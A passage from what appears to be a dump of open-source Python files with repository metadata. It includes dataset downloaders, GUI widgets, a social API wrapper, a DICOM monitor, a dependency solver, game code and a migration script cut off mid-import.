| agpl-3.0 | -796,952,061,882,075,500 | 40.724138 | 120 | 0.562075 | false | 3.271253 | true | false | false |
dani-i/bachelor-project | file_experts/data_set/cifar10_data_set_preparations.py | 1 | 3240 | from file_experts.data_set.data_set_validator import DataSetValidator
from file_experts.data_set import data_set_creator
from time import sleep
import constants.create_data_set_constants as const
import file_experts.file_expert as fe
import urllib.request
import threading
import tarfile
class Cifar10DataSetPreparations(threading.Thread):
"""
- Makes sure the Cifar 10 data set files are present and intact.
- If required it can download the Cifar 10 data set and / or extract
the data set.
"""
def __init__(
self,
progress_update_method):
"""
:param progress_update_method: GUI method that updates the download
progress.
"""
super(Cifar10DataSetPreparations, self).__init__()
self._progress_update_method = progress_update_method
#########################################################################
# Helper methods
def _make_sure_the_required_files_exist(self):
"""
- Makes sure that the Cifar10 files exist and are valid.
"""
if not fe.is_directory(const.CIFAR10_SAVE_LOCATION):
fe.crete_directory(const.CIFAR10_SAVE_LOCATION)
if self._download_cifar10():
self._extract_cifar10()
else:
if DataSetValidator.check_if_extract_is_needed():
if DataSetValidator.check_if_download_is_needed():
if not self._download_cifar10():
return
self._extract_cifar10()
def _download_cifar10(self):
"""
- Downloads Cifar10 binary version.
"""
number_of_tries = 0
while number_of_tries < const.CIFAR10_DOWNLOAD_NUMBER_OF_TRIES:
try:
urllib.request.urlretrieve(
const.CIFAR10_DOWNLOAD_LINK,
const.CIFAR10_ARCHIVE_PATH,
self._update_download_progress
)
return True
except Exception as _:
data_set_creator.cifar10_download_try_failed = True
sleep(60)
number_of_tries += 1
data_set_creator.cifar10_download_failed = True
return False
def _update_download_progress(
self,
count,
block_size,
total_size):
"""
- Calls the download progress update method, passing the percent of
the progress.
"""
self._progress_update_method(
int(count * block_size / float(total_size) * 100)
)
@staticmethod
def _extract_cifar10():
"""
- Extracts the Cifar 10 data set archive.
"""
with tarfile.open(const.CIFAR10_ARCHIVE_PATH, 'r:gz') as archive:
archive.extractall(const.CIFAR10_SAVE_LOCATION)
#########################################################################
# Public methods
def run(self):
"""
- Call this method to start the Cifar 10 data set preparations.
"""
self._make_sure_the_required_files_exist()
#########################################################################
| apache-2.0 | 8,903,633,220,386,401,000 | 27.928571 | 77 | 0.52963 | false | 4.444444 | false | false | false |
freemed/orthanc | Resources/Samples/Python/ChangesLoop.py | 1 | 2310 | #!/usr/bin/python
# Orthanc - A Lightweight, RESTful DICOM Store
# Copyright (C) 2012-2014 Medical Physics Department, CHU of Liege,
# Belgium
#
# This program is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import time
import sys
import RestToolbox
##
## Print help message
##
if len(sys.argv) != 3:
print("""
Sample script that continuously monitors the arrival of new DICOM
images into Orthanc (through the Changes API).
Usage: %s [hostname] [HTTP port]
For instance: %s localhost 8042
""" % (sys.argv[0], sys.argv[0]))
exit(-1)
URL = 'http://%s:%d' % (sys.argv[1], int(sys.argv[2]))
##
## The following function is called each time a new instance is
## received.
##
def NewInstanceReceived(path):
global URL
patientName = RestToolbox.DoGet(URL + path + '/content/PatientName')
# Remove the possible trailing characters due to DICOM padding
patientName = patientName.strip()
print 'New instance received for patient "%s": "%s"' % (patientName, path)
##
## Main loop that listens to the changes API.
##
current = 0
while True:
r = RestToolbox.DoGet(URL + '/changes', {
'since' : current,
'limit' : 4 # Retrieve at most 4 changes at once
})
for change in r['Changes']:
# We are only interested interested in the arrival of new instances
if change['ChangeType'] == 'NewInstance':
# Call the callback function
path = change['Path']
NewInstanceReceived(path)
# Delete the instance once it has been discovered
RestToolbox.DoDelete(URL + path)
current = r['Last']
if r['Done']:
print "Everything has been processed: Waiting..."
time.sleep(1)
| gpl-3.0 | 8,063,557,085,211,736,000 | 25.860465 | 78 | 0.669697 | false | 3.786885 | false | false | false |
MalloyDelacroix/DownloaderForReddit | DownloaderForReddit/gui/database_views/filter_input_widget.py | 1 | 5786 | from PyQt5.QtWidgets import QWidget, QLineEdit, QSpinBox, QComboBox, QDateTimeEdit, QSizePolicy
from PyQt5.QtCore import Qt, pyqtSignal
from sqlalchemy import Integer, String, DateTime, Enum, Boolean
from DownloaderForReddit.guiresources.database_views.filter_input_widget_auto import Ui_FilterInputWidget
from DownloaderForReddit.database.filters import (DownloadSessionFilter, RedditObjectFilter, PostFilter, ContentFilter,
CommentFilter)
from DownloaderForReddit.utils import injector
from .filter_item import FilterItem
class FilterInputWidget(QWidget, Ui_FilterInputWidget):
export_filter = pyqtSignal(list)
def __init__(self, parent=None):
QWidget.__init__(self, parent=parent)
self.setupUi(self)
self.settings_manager = injector.get_settings_manager()
self.launch_quick_filter = True
self.filter_model_map = {
'DOWNLOAD_SESSION': DownloadSessionFilter,
'REDDIT_OBJECT': RedditObjectFilter,
'POST': PostFilter,
'CONTENT': ContentFilter,
'COMMENT': CommentFilter
}
self.field_type_map = {
Boolean: self.get_boolean_field,
Integer: self.get_integer_field,
String: self.get_string_field,
DateTime: self.get_datetime_field
}
self.value_field = None
self.add_filter_button.clicked.connect(self.add_filter)
self.model_combo.currentIndexChanged.connect(self.set_fields)
self.model_list = ['DOWNLOAD_SESSION', 'REDDIT_OBJECT', 'POST', 'CONTENT', 'COMMENT']
for model in self.model_list:
self.model_combo.addItem(model.replace('_', ' ').title(), model)
operators = [('Equal To', 'eq'), ('Not Equal', 'not'), ('<', 'lt'), ('<=', 'lte'), ('>', 'gt'), ('>=', 'gte'),
('In', 'in'), ('Like', 'like'), ('Contains', 'contains')]
for x in operators:
self.operator_combo.addItem(x[0], x[1])
self.set_fields()
self.field_combo.currentIndexChanged.connect(self.set_value_field)
self.set_value_field()
self.quick_filter_combo.addItem('Quick Filters')
self.quick_filter_combo.addItems(self.settings_manager.database_view_quick_filters.keys())
self.quick_filter_combo.currentIndexChanged.connect(self.handle_quick_filter)
@property
def current_model(self):
return self.model_combo.currentData(Qt.UserRole)
@property
def current_field(self):
return self.field_combo.currentData(Qt.UserRole)
@property
def current_operator(self):
return self.operator_combo.currentData(Qt.UserRole)
def set_model_combo(self, model):
try:
self.model_combo.setCurrentIndex(self.model_list.index(model))
except IndexError:
pass
def set_fields(self):
self.field_combo.clear()
f = self.filter_model_map[self.current_model]
for field in f.get_filter_fields():
self.field_combo.addItem(field.replace('_', ' ').title(), field)
def set_value_field(self):
current_field = self.current_field
if current_field is not None:
f = self.filter_model_map[self.current_model]()
filed_type = f.get_type(current_field)
if filed_type == Enum:
field = self.get_choice_field(choices=f.get_choices(current_field))
else:
field = self.field_type_map[filed_type]()
if not isinstance(field, type(self.value_field)):
try:
self.value_layout.removeWidget(self.value_field)
self.value_field.deleteLater()
except AttributeError:
pass
self.value_field = field
self.value_layout.addWidget(self.value_field)
def get_value(self):
t = type(self.value_field)
if t == QComboBox:
return self.value_field.currentData(Qt.UserRole)
elif t == QLineEdit:
return self.value_field.text()
elif t == QSpinBox:
return self.value_field.value()
def handle_quick_filter(self):
if self.launch_quick_filter and self.quick_filter_combo.currentIndex() != 0:
self.launch_quick_filter = False
filter_name = self.quick_filter_combo.currentText()
filters = [FilterItem(**filter_dict) for filter_dict in
self.settings_manager.database_view_quick_filters[filter_name]]
self.add_filter(filters)
self.quick_filter_combo.setCurrentIndex(0)
self.launch_quick_filter = True
def add_filter(self, filters=None):
if type(filters) != list:
filters = [self.create_filter()]
self.export_filter.emit(filters)
def create_filter(self):
return FilterItem(self.current_model, self.current_field, self.current_operator, self.get_value())
def get_boolean_field(self):
combo = QComboBox()
combo.addItem('True', True)
combo.addItem('False', False)
return combo
def get_integer_field(self):
spin_box = QSpinBox()
spin_box.setMaximum(1000000000)
return spin_box
def get_string_field(self):
x = QLineEdit()
x.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Fixed)
return x
def get_choice_field(self, choices):
combo = QComboBox()
for x in choices:
combo.addItem(x)
return combo
def get_datetime_field(self):
return QDateTimeEdit()
def keyPressEvent(self, event):
if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:
self.add_filter()
| gpl-3.0 | 4,671,662,413,270,167,000 | 36.571429 | 119 | 0.612167 | false | 3.973901 | false | false | false |
XYM1988/Algorithm | Chp8/8.1-General-Tree.py | 1 | 2720 | # Tree is an organizational relationship that is richer than the simple "before"
# and "after" relationships between objects in sequences.
# We define a tree T as a set of nodes storing elements such that the nodes have
# a parent-child relationship that satisfies the following properties:
# 1. If T is nonempty, it has a special node, called the root of T, that has no parent
# 2. Each node v of T different from the root has a unique parent node w; every
# node with parent w is a child of w.
# Two nodes that are children of the same parent are siblings.
# A node v is external if v has no children.
# A node v is internal if it has one or more children.
# Ancestor
# Descendant
# edge: A pair of two nodes
# path: A sequence of nodes such that any two consecutive nodes in the sequence
# form an edge.
# A tree is ordered if there is a meaningful linear order among the children of
# each node. -- Ordered Tree
class Tree:
""" Abstract base class representing a tree structure. """
class Position:
"""An abstraction representing the location of a single element."""
def element(self):
""" Return the element stored at this Position. """
raise NotImplementedError
def __eq__(self, other):
""" Return True if other Position represents the same location. """
raise NotImplementedError
def __ne__(self, other):
""" Return True if other does not represent the same location. """
return not (self == other)
def root(self):
""" Return Position representing the tree's root (or None if it's empty)"""
raise NotImplementedError
def parent(self, p):
""" Return Position representing p's parent (or None if p is root) """
raise NotImplementedError
def num_children(self, p):
""" Return the number of children that Position p has. """
raise NotImplementedError
def children(self, p):
""" Generate an iteration of Positions representing p's children. """
raise NotImplementedError
def __len__(self):
""" Return the total number of elements in the tree. """
raise NotImplementedError
def is_root(self, p):
""" Return True if Position p represents the root of the tree. """
return self.root() == p
def is_leaf(self, p):
""" Return True if Position p does not have any children. """
return self.num_children(p) == 0
def is_empty(self, p):
""" Return True if the tree is empty """
return len(self) == 0
# Depth calculation:
def depth(self, p):
if self.is_root(p):
return 0
else:
return self.depth(self.parent(p)) + 1
| mit | -5,231,915,822,319,370,000 | 37.857143 | 86 | 0.649632 | false | 4.394184 | false | false | false |
anthill-platform/anthill-social | anthill/social/model/social/facebook.py | 1 | 2400 |
import datetime
from anthill.common import to_int
from anthill.common.social import APIError
from anthill.common.social.apis import FacebookAPI
from .. social import SocialAPI, SocialAuthenticationRequired
from .. token import NoSuchToken
class FacebookSocialAPI(SocialAPI, FacebookAPI):
def __init__(self, application, tokens, cache):
SocialAPI.__init__(self, application, tokens, "facebook", cache)
FacebookAPI.__init__(self, cache)
async def call(self, gamespace, account_id, method, *args, **kwargs):
"""
Makes facebook API call.
Validates everything, gathers tokens and then awaits `method` with all information.
"""
try:
token_data = await self.tokens.get_token(
gamespace,
account_id,
self.credential_type)
except NoSuchToken:
raise SocialAuthenticationRequired(self.credential_type, None)
expires_at = token_data.expires_at
access_token = token_data.access_token
data = token_data.payload
try:
if datetime.datetime.now() > expires_at:
raise SocialAuthenticationRequired(self.credential_type, token_data.username)
kwargs["access_token"] = access_token
result = await method(gamespace, *args, **kwargs)
except APIError as e:
if e.code == 401 or e.code == 400:
raise SocialAuthenticationRequired(self.credential_type, token_data.username)
raise e
else:
return result
async def list_friends(self, gamespace, account_id):
friends = await self.call(gamespace, account_id, self.api_get_friends)
return friends
def has_friend_list(self):
return True
async def get_social_profile(self, gamespace, username, account_id, env=None):
user_info = await self.call(
gamespace,
account_id,
self.api_get_user_info,
fields="id,name,email,locale")
return user_info
async def import_social(self, gamespace, username, auth):
access_token = auth.access_token
expires_in = to_int(auth.expires_in)
data = {}
result = await self.import_data(
gamespace,
username,
access_token,
expires_in, data)
return result
| mit | 5,517,608,928,784,957,000 | 29.379747 | 93 | 0.614167 | false | 4.232804 | false | false | false |
NDKoehler/DataScienceBowl2017_7th_place | dsb3_networks/classification/resnet2D_0.7res_80/config_2Dfinal.py | 1 | 3207 | from collections import defaultdict
from datetime import datetime
import json
import tensorflow as tf
import os, sys
import pandas as pd
#config dic
H = defaultdict(lambda: None)
#All possible config options:
H['optimizer'] = 'MomentumOptimizer'#'RMSPropOptimizer'
H['learning_rate'] = 0.001
H['momentum'] = 0.9 #0.99
H['kernel_num'] = 16 #32
H['dropout_keep_prob'] = 1.0
H['gpu_fraction'] = 0.9
H['num_classes'] = 2
H['model_name'] = 'resnet2D'
H['pretrained_checkpoint_dir'] = '../luna_resnet2D/output_dir/gold_prio3_plane_mil0'#../luna_resnet2D/output_dir/gen8_20z_3rot_stage1_deep
H['output_dir'] = 'output_dir/old_but_gold_plane_mil0_b4_init_luna' #cross_crop_retrain_zrot
H['predictions_dir'] = ''
H['allow_soft_placement'] = True
H['log_device_placement'] = False
H['max_steps'] = 35
H['MOVING_AVERAGE_DECAY'] = 0.9
H['BATCH_NORM_CENTER'] = True
H['BATCH_NORM_SCALE'] = True
H['weights_initializer'] = 'xavier_initializer' #'xavier_initializer', 'xavier_initializer_conv2d', 'truncated_normal_initializer'
H['gpus'] = [1]
H['summary_step'] = 10
# list iterator
# H['train_lst'] = '../data/multiview-2/tr.lst'
# H['val_lst'] = '../data/multiview-2/va.lst'
H['train_lst'] = '../../../datapipeline_final/dsb3_0/interpolate_candidates_res07/tr_patients_80.lst'
H['val_lst'] = '../../../datapipeline_final/dsb3_0/interpolate_candidates_res07/va_patients_20.lst'
#tr_path = '/media/niklas/Data_3/dsb3/datapipeline_gen9/dsb3_0/interpolate_candidates/cv5/cv/tr' + str(run_id) + '.lst'
#va_path = '/media/niklas/Data_3/dsb3/datapipeline_gen9/dsb3_0/interpolate_candidates/cv5/cv/va' + str(run_id) + '.lst'
#H['train_lst'] = tr_path
#H['val_lst'] = va_path
H['candidate_mode'] = False
# crossed axes options - cross is centrally cropped -> layers are stacked in z-dim
H['num_crossed_layers'] = 1
H['crossed_axes'] = [0,1,2]
H['rand_drop_planes']=0
H['plane_mil'] = False
# y and x image_shape must be equal -> z has same shape!!!
# you can crop if the equal z,y and x in image shape are and smaller than in in_image_shape
# images
# in_image_shapes[1:] must be equal to len of crop_before_loading_in_RAM_ZminZmaxYminYmaxXminXmax
H['in_image_shape'] = [5, 64, 64, 64, 2] #256
# not working #H['crop_before_loading_in_RAM_ZminZmaxYminYmaxXminXmax'] = [False,False,False,False,False,False] # Default = False or None
H['image_shape'] = [5, 3*H['num_crossed_layers'], 64, 64, 2]
H['label_shape'] = [1] #256
H['batch_size'] = 8
#iterator settings
H['load_in_ram'] = True
# due to time consuming operation and quality loss only rotation around one axis is processed randomly chosen
H['rand_rot_axes'] = [0]#,1,2] # 0: z, 1: y, 2: x (attention: x and y rotation lasts long)
H['rand_rot'] = True
H['degree_90_rot'] = H['rand_rot']
H['min_rot_angle'] = -10 #degree
H['max_rot_angle'] = 10 #degree
H['rand_mirror_axes'] = [0,1,2] # 0: z, 1: y, 2: x else False
H['rand_cropping_ZminZmaxYminYmaxXminXmax'] = [False,False,False,False,False,False] # crop within given range # default False: full range
H['save_step'] = 10 # saving checkpoint
H['tr_num_examples'] = len(pd.read_csv(H['train_lst'], header=None, sep='\t'))
H['va_num_examples'] = len(pd.read_csv(H['val_lst'], header=None, sep='\t'))
| mit | 1,141,336,467,683,056,600 | 35.033708 | 138 | 0.683505 | false | 2.613692 | false | true | false |
duducosmos/pgs4a | private/lib/android/apk.py | 1 | 3947 | import os
import struct
import zipfile
import cStringIO
class SubFile(object):
def __init__(self, f, name, base, length):
self.f = f
self.base = base
self.offset = 0
self.length = length
self.name = name
self.f.seek(self.base)
def read(self, length=None):
maxlength = self.length - self.offset
if length is not None:
length = min(length, maxlength)
else:
length = maxlength
if length:
rv2 = self.f.read(length)
self.offset += len(rv2)
else:
rv2 = ""
return rv2
def readline(self, length=None):
maxlength = self.length - self.offset
if length is not None:
length = min(length, maxlength)
else:
length = maxlength
# Otherwise, let the system read the line all at once.
rv = self.f.readline(length)
self.offset += len(rv)
return rv
def readlines(self, length=None):
rv = [ ]
while True:
l = self.readline(length)
if not l:
break
if length is not None:
length -= len(l)
if l < 0:
break
rv.append(l)
return rv
def xreadlines(self):
return self
def __iter__(self):
return self
def next(self):
rv = self.readline()
if not rv:
raise StopIteration()
return rv
def flush(self):
return
def seek(self, offset, whence=0):
if whence == 0:
offset = offset
elif whence == 1:
offset = self.offset + offset
elif whence == 2:
offset = self.length + offset
if offset > self.length:
offset = self.length
self.offset = offset
if offset < 0:
offset = 0
self.f.seek(offset + self.base)
def tell(self):
return self.offset
def close(self):
self.f.close()
def write(self, s):
raise Exception("Write not supported by SubFile")
class APK(object):
def __init__(self, apk=None, prefix="assets/"):
"""
Opens an apk file, and lets you read the assets out of it.
`apk`
The path to the file to open. If this is None, it defaults to the
apk file we are run out of.
`prefix`
The prefix inside the apk file to read.
"""
if apk is None:
apk = os.environ["ANDROID_APK"]
self.apk = apk
self.zf = zipfile.ZipFile(apk, "r")
# A map from unprefixed filename to ZipInfo object.
self.info = { }
for i in self.zf.infolist():
fn = i.filename
if not fn.startswith(prefix):
continue
fn = fn[len(prefix):]
self.info[fn] = i
def list(self):
return sorted(self.info)
def open(self, fn):
if fn not in self.info:
raise IOError("{0} not found in apk.".format(fn))
info = self.info[fn]
if info.compress_type == zipfile.ZIP_STORED:
f = file(self.apk, "rb")
f.seek(info.header_offset)
h = struct.unpack(zipfile.structFileHeader, f.read(zipfile.sizeFileHeader))
offset = (info.header_offset +
zipfile.sizeFileHeader +
h[zipfile._FH_FILENAME_LENGTH] +
h[zipfile._FH_EXTRA_FIELD_LENGTH])
return SubFile(
f,
self.apk,
offset,
info.file_size)
return cStringIO.StringIO(self.zf.read(info))
| lgpl-2.1 | 7,976,596,062,115,813,000 | 21.683908 | 87 | 0.478085 | false | 4.464932 | false | false | false |
enthought/depsolver | depsolver/pool.py | 1 | 8318 | import collections
from .bundled.traitlets \
import \
HasTraits, Dict, Instance, List, Long, Unicode
from .errors \
import \
DepSolverError, MissingPackageInfoInPool
from .package \
import \
PackageInfo
from .repository \
import \
Repository
from .requirement \
import \
Requirement
from .utils \
import \
CachedScheduler
MATCH_NONE = 0
MATCH_NAME = 1
MATCH = 2
MATCH_PROVIDE = 3
MATCH_REPLACE = 4
class Pool(HasTraits):
"""Pool objects model a pool of repositories.
Pools are able to find packages that provide a given requirements (handling
the provides concept from package metadata).
"""
repositories = List(Instance(Repository))
_packages_by_id = Dict()
_packages_by_name = Dict()
_id = Long(1)
_repository_by_name = Instance(collections.defaultdict)
_scheduler = Instance(CachedScheduler)
def __init__(self, repositories=None, **kw):
scheduler = CachedScheduler()
repository_by_name = collections.defaultdict(list)
super(Pool, self).__init__(self, _scheduler=scheduler,
_repository_by_name=repository_by_name, **kw)
if repositories is None:
repositories = []
# provide.name -> package mapping
self._packages_by_name = collections.defaultdict(list)
if len(repositories) > 0:
for repository in repositories:
self.add_repository(repository)
def has_package(self, package):
package_id = package.id
return package_id in self._packages_by_id
def add_repository(self, repository):
"""Add a repository to this pool.
Arguments
---------
repository: Repository
repository to add
"""
self.repositories.append(repository)
self._repository_by_name[repository.name].append(repository)
for package in repository.iter_packages():
package.id = self._id
self._id += 1
self._packages_by_id[package.id] = package
self._packages_by_name[package.name].append(package)
for provide in package.provides:
self._packages_by_name[provide.name].append(package)
for replace in package.replaces:
self._packages_by_name[replace.name].append(package)
def package_by_id(self, package_id):
"""Retrieve a package from its id.
Arguments
---------
package_id: str
A package id
"""
try:
return self._packages_by_id[package_id]
except KeyError:
raise MissingPackageInfoInPool(package_id)
def what_provides(self, requirement, mode='composer'):
"""Returns a list of packages that provide the given requirement.
Arguments
---------
requirement: Requirement
the requirement to match
mode: str
One of the following string:
- 'composer': behaves like Composer does, i.e. only returns
packages that match this requirement directly, unless no
match is found in which case packages that provide the
requirement indirectly are returned.
- 'direct_only': only returns packages that match this
requirement directly (i.e. provides are ignored).
- 'include_indirect': only returns packages that match this
requirement directly or indirectly (i.e. includes packages
that provides this package)
"""
# FIXME: this is conceptually copied from whatProvides in Composer, but
# I don't understand why the policy of preferring non-provided over
# provided packages is handled here.
if not mode in ['composer', 'direct_only', 'include_indirect']:
raise ValueError("Invalid mode %r" % mode)
strict_matches = []
provided_match = []
name_match = False
for package in self._packages_by_name[requirement.name]:
match = self.matches(package, requirement)
if match == MATCH_NONE:
pass
elif match == MATCH_NAME:
name_match = True
elif match == MATCH:
name_match = True
strict_matches.append(package)
elif match == MATCH_PROVIDE:
provided_match.append(package)
elif match == MATCH_REPLACE:
strict_matches.append(package)
else:
raise ValueError("Invalid match type: {}".format(match))
if mode == 'composer':
if name_match:
return strict_matches
else:
return strict_matches + provided_match
elif mode == 'direct_only':
return strict_matches
elif mode == 'include_indirect':
return strict_matches + provided_match
def matches(self, candidate, requirement):
"""Checks whether the candidate package matches the requirement, either
directly or through provides.
Arguments
---------
candidate: PackageInfo
Candidate package
requirement: Requirement
The requirement to match
Returns
-------
match_type: _Match or False
An instance of Match, that specified the type of match:
- if only the name matches, will be MATCH_NAME
- if the name and version actually match, will be MATCH
- if the match is through the package's provides, will be MATCH_PROVIDE
- if no match at all, will be False
Examples
--------
>>> from depsolver import PackageInfo, Requirement
>>> R = Requirement.from_string
>>> pool = Pool()
>>> pool.matches(PackageInfo.from_string('numpy-1.3.0'), R('numpy >= 1.2.0')) == MATCH
True
"""
if requirement.name == candidate.name:
candidate_requirement = Requirement.from_package_string(candidate.unique_name, candidate.version_factory)
if requirement.is_universal or candidate_requirement.matches(requirement):
return MATCH
else:
return MATCH_NAME
else:
for provide in candidate.provides:
if requirement.matches(provide):
return MATCH_PROVIDE
for replace in candidate.replaces:
if requirement.matches(replace):
return MATCH_REPLACE
return MATCH_NONE
def id_to_string(self, package_id):
"""
Convert a package id to a nice string representation.
"""
package = self.package_by_id(abs(package_id))
if package_id > 0:
return "+" + str(package)
else:
return "-" + str(package)
#------------------------
# Repository priority API
#------------------------
def set_repository_order(self, repository_name, after=None, before=None):
candidates = self._repository_by_name[repository_name]
if len(candidates) < 1:
raise DepSolverError("No repository with name '%s'" % (repository_name,))
else:
self._scheduler.set_constraints(repository_name, after, before)
def repository_priority(self, repository):
"""
Returns the priority of a repository.
Priorities are in the ]-inf, 0] integer range, and the ordering is the
same as integers: the lower the priority number, the less a repository
has priority over other repositories.
If no constraint has been set up for the repository, its priority is 0.
Parameters
----------
repository: Repository
The repository to compute the priority of.
"""
if repository.name in self._repository_by_name:
priorities = self._scheduler.compute_priority()
# We return a negative number to follow Composer convention.
return priorities.get(repository.name, 0) - (len(priorities) - 1)
else:
raise DepSolverError("Unknown repository name '%s'" % (repository.name,))
| bsd-3-clause | -270,076,686,273,748,060 | 33.658333 | 117 | 0.583914 | false | 4.797001 | false | false | false |
pmoleri/memorize-accesible | speak/espeak_cmd.py | 1 | 2079 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import re
import subprocess
import logging
logger = logging.getLogger('speak')
import espeak
PITCH_MAX = 99
RATE_MAX = 99
PITCH_DEFAULT = PITCH_MAX/2
RATE_DEFAULT = RATE_MAX/3
class AudioGrabCmd(espeak.BaseAudioGrab):
def speak(self, status, text):
self.make_pipeline('filesrc name=file-source')
# espeak uses 80 to 370
rate = 80 + (370-80) * int(status.rate) / 100
wavpath = "/tmp/speak.wav"
subprocess.call(["espeak", "-w", wavpath, "-p", str(status.pitch),
"-s", str(rate), "-v", status.voice.name, text],
stdout=subprocess.PIPE)
self.stop_sound_device()
# set the source file
self.pipeline.get_by_name("file-source").props.location = wavpath
# play
self.restart_sound_device()
def voices():
out = []
result = subprocess.Popen(["espeak", "--voices"], stdout=subprocess.PIPE) \
.communicate()[0]
for line in result.split('\n'):
m = re.match(r'\s*\d+\s+([\w-]+)\s+([MF])\s+([\w_-]+)\s+(.+)', line)
if not m:
continue
language, gender, name, stuff = m.groups()
if stuff.startswith('mb/') or \
name in ('en-rhotic','english_rp','english_wmids'):
# these voices don't produce sound
continue
out.append((language, name))
return out
| gpl-2.0 | -3,199,728,626,601,833,000 | 31.484375 | 79 | 0.634921 | false | 3.719141 | false | false | false |
gfrances/model-based-social-simulations | experiments/all-agents-simple.py | 1 | 1661 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
# from experiments.src.exp import AggregateExperiment, MDPAgentConfiguration, SingleExperiment
from src.sequential_taskgen import SequentialTaskgen
from src.experiment import AggregateExperiment, MDPAgentConfiguration, SingleExperiment, LazyAgentConfiguration, \
RandomAgentConfiguration, GreedyAgentConfiguration, MotionlessAgentConfiguration
def main():
"""
A simple single-run experiment comparing the performance of 10 units of each of our agent types.
"""
exp = AggregateExperiment(parse_arguments())
pop = 10
mdp = MDPAgentConfiguration(population=pop, horizon=6, width=1000)
lazy = LazyAgentConfiguration(population=pop, alpha=0.7)
random = RandomAgentConfiguration(population=pop)
greedy = GreedyAgentConfiguration(population=pop)
motionless = MotionlessAgentConfiguration(population=pop)
exp.add_single(SingleExperiment(timesteps=200, runs=1, simulation_map='r25_i0',
label="all", agents=[mdp, lazy, random, greedy, motionless]))
exp.bootstrap()
t = SequentialTaskgen(exp)
t.run()
def parse_arguments():
parser = argparse.ArgumentParser(description='Generate experiment task runners.')
parser.add_argument("--name", help='The name/ID we want to give to the experiment', default='all-agents')
parser.add_argument("--timeout", help='Maximum timeout allowed, in seconds', type=int, default='0')
parser.add_argument("--mem", help='Maximum memory allowed, in GB', default='0', type=int)
args = parser.parse_args()
return args
if __name__ == "__main__":
main()
| gpl-2.0 | -2,915,125,925,642,806,000 | 38.547619 | 114 | 0.718844 | false | 4.071078 | true | false | false |
keithfancher/Blobulous | blobulous/enemy.py | 1 | 3919 | # Copyright 2011, 2012 Keith Fancher
#
# This file is part of Blobulous.
#
# Blobulous is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Blobulous is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Blobulous. If not, see <http://www.gnu.org/licenses/>.
import random
import pygame
import settings as s
from explosion import Explosion
class Enemy(pygame.sprite.Sprite):
def __init__(self, explosion_container, *containers):
# Call the parent's constructor
pygame.sprite.Sprite.__init__(self, containers)
# Set speed vector
self.delta_x = 0
self.delta_y = 0
# Whether this enemy is currently targeted by the player
self.targeted = False
# Used by the circle collision detection. Allows a slightly smaller and
# more accurate hit "box".
self.radius = 21
# Load the image
self.image = pygame.image.load("images/enemy.png").convert()
self.image.set_colorkey(pygame.Color('black'))
self.rect = self.image.get_rect()
# Need to pass the enemy a sprite group to contain its explosion after
# it's destroyed, so the explosion can live on after the enemy has long
# since bitten the dust
self.explosion_container = explosion_container
self.random_spawn()
def update(self):
"""Update enemy position"""
self.rect.top += self.delta_y
self.rect.left += self.delta_x
self.kill_if_offscreen() # Destroy object if offscreen
def kill(self):
"""Override Sprite.kill() so enemies (and their descendent classes)
will explode instead of just disappearing"""
Explosion(self.rect.center, self.explosion_container)
pygame.sprite.Sprite.kill(self)
def kill_if_offscreen(self):
"""Kill any enemies that go more than 60 pixels off the screen"""
if self.rect.left < -60 or self.rect.left > s.SCREEN_W + 60:
self.kill()
elif self.rect.top < -60 or self.rect.top > s.SCREEN_H + 60:
self.kill()
def random_spawn(self):
"""Spawns somewhere off the screen with random direction and speed"""
# Directional constants... makes this shit a bit easier to read
TOP = 0
BOTTOM = 1
LEFT = 2
RIGHT = 3
# At top of screen, bottom, left, or right
spawn_location = random.randint(0, 3)
if spawn_location == TOP:
self.rect.left = random.randint(0, s.SCREEN_W - self.rect.width)
self.rect.bottom = 0
self.delta_x = random.randint(-5, 5)
self.delta_y = random.randint(1, 5) # gotta move down
elif spawn_location == BOTTOM:
self.rect.left = random.randint(0, s.SCREEN_W - self.rect.width)
self.rect.top = s.SCREEN_H
self.delta_x = random.randint(-5, 5)
self.delta_y = random.randint(-5, -1) # gotta move up
elif spawn_location == LEFT:
self.rect.right = 0
self.rect.top = random.randint(0, s.SCREEN_H - self.rect.height)
self.delta_x = random.randint(1, 5) # gotta move right
self.delta_y = random.randint(-5, 5)
elif spawn_location == RIGHT:
self.rect.left = s.SCREEN_W
self.rect.top = random.randint(0, s.SCREEN_H - self.rect.height)
self.delta_x = random.randint(-5, -1) # gotta move left
self.delta_y = random.randint(-5, 5)
| gpl-3.0 | 157,451,090,156,659,620 | 35.287037 | 79 | 0.628987 | false | 3.725285 | false | false | false |
Beit-Hatfutsot/dbs-back | scripts/migrate.py | 1 | 16413 | # -*- coding: utf-8 -*-
import re
import os
import sys
import logging
from argparse import ArgumentParser
from decimal import Decimal
import datetime
import calendar
import time
from functools import partial
from pymongo import MongoClient
from pymongo.errors import BulkWriteError
from bson.code import Code
from gedcom import Gedcom, GedcomParseError
from migration.migration_sqlclient import MigrationSQLClient
from migration.tasks import update_row
from migration.files import upload_photo
from migration.family_trees import Gedcom2Persons
from bhs_api.utils import get_migrate_conf, create_thumb, get_unit_type
from bhs_api import phonetic
from bhs_api.item import get_collection_id_field
conf = get_migrate_conf(('queries_repo_path', 'sql_server', 'sql_user', 'sql_password',
